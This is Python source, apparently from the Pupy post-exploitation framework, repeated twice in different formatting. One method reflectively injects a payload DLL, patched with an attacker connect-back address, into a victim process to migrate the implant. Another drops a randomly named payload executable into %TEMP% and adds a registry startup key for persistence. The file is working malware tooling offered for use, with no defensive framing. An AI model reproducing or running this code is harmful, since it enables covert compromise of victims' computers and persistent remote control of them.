def run(self, args): dllbuf=b"" isProcess64bits=False #TODO automatically fill ip/port self.client.load_package("psutil") self.client.load_package("pupwinutils.processes") self.success("looking for configured connect back address ...") res=self.client.conn.modules['pupy'].get_connect_back_host() host, port=res.rsplit(':',1) self.success("address configured is %s:%s ..."%(host,port)) self.success("looking for process %s architecture ..."%args.pid) if self.client.conn.modules['pupwinutils.processes'].is_process_64(args.pid): isProcess64bits=True self.success("process is 64 bits") dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx64.dll"), host, port) else: self.success("process is 32 bits") dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.dll"), host, port) self.success("injecting DLL in target process %s ..."%args.pid) self.client.conn.modules['pupy'].reflective_inject_dll(args.pid, dllbuff, isProcess64bits) self.success("DLL injected !") self.success("waiting for a connection from the DLL ...") while True: c=has_proc_migrated(self.client, args.pid) if c: self.success("got a connection from migrated DLL !") c.desc["id"]=self.client.desc["id"] break time.sleep(0.1) try: self.client.conn.exit() except Exception: pass
def run(self, args): if args.method=="registry": self.client.load_package("pupwinutils.persistence") #retrieving conn info res=self.client.conn.modules['pupy'].get_connect_back_host() host, port=res.rsplit(':',1) self.info("generating exe ...") #generating exe exebuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.exe"), host, port) remote_path=self.client.conn.modules['os.path'].expandvars("%TEMP%\\{}.exe".format(''.join([random.choice(string.ascii_lowercase) for x in range(0,random.randint(6,12))]))) self.info("uploading to %s ..."%remote_path) #uploading rf=self.client.conn.builtin.open(remote_path, "wb") chunk_size=16000 pos=0 while True: buf=exebuff[pos:pos+chunk_size] if not buf: break rf.write(buf) pos+=chunk_size rf.close() self.success("upload successful") #adding persistency self.info("adding to registry ...") self.client.conn.modules['pupwinutils.persistence'].add_registry_startup(remote_path) self.info("registry key added") self.success("persistence added !") else: self.error("not implemented")
def run(self, args): dllbuf = b"" isProcess64bits = False #TODO automatically fill ip/port self.client.load_package("psutil") self.client.load_package("pupwinutils.processes") self.success("looking for configured connect back address ...") res = self.client.conn.modules['pupy'].get_connect_back_host() host, port = res.rsplit(':', 1) self.success("address configured is %s:%s ..." % (host, port)) self.success("looking for process %s architecture ..." % args.pid) if self.client.conn.modules['pupwinutils.processes'].is_process_64( args.pid): isProcess64bits = True self.success("process is 64 bits") dllbuff = genpayload.get_edit_binary( os.path.join("payloads", "pupyx64.dll"), host, port) else: self.success("process is 32 bits") dllbuff = genpayload.get_edit_binary( os.path.join("payloads", "pupyx86.dll"), host, port) self.success("injecting DLL in target process %s ..." % args.pid) self.client.conn.modules['pupy'].reflective_inject_dll( args.pid, dllbuff, isProcess64bits) self.success("DLL injected !") self.success("waiting for a connection from the DLL ...") while True: c = has_proc_migrated(self.client, args.pid) if c: self.success("got a connection from migrated DLL !") c.desc["id"] = self.client.desc["id"] break time.sleep(0.1) try: self.client.conn.exit() except Exception: pass
def run(self, args): if args.method == "registry": self.client.load_package("pupwinutils.persistence") #retrieving conn info res = self.client.conn.modules['pupy'].get_connect_back_host() host, port = res.rsplit(':', 1) self.info("generating exe ...") #generating exe exebuff = genpayload.get_edit_binary( os.path.join("payloads", "pupyx86.exe"), host, port) remote_path = self.client.conn.modules['os.path'].expandvars( "%TEMP%\\{}.exe".format(''.join([ random.choice(string.ascii_lowercase) for x in range(0, random.randint(6, 12)) ]))) self.info("uploading to %s ..." % remote_path) #uploading rf = self.client.conn.builtin.open(remote_path, "wb") chunk_size = 16000 pos = 0 while True: buf = exebuff[pos:pos + chunk_size] if not buf: break rf.write(buf) pos += chunk_size rf.close() self.success("upload successful") #adding persistency self.info("adding to registry ...") self.client.conn.modules[ 'pupwinutils.persistence'].add_registry_startup(remote_path) self.info("registry key added") self.success("persistence added !") else: self.error("not implemented")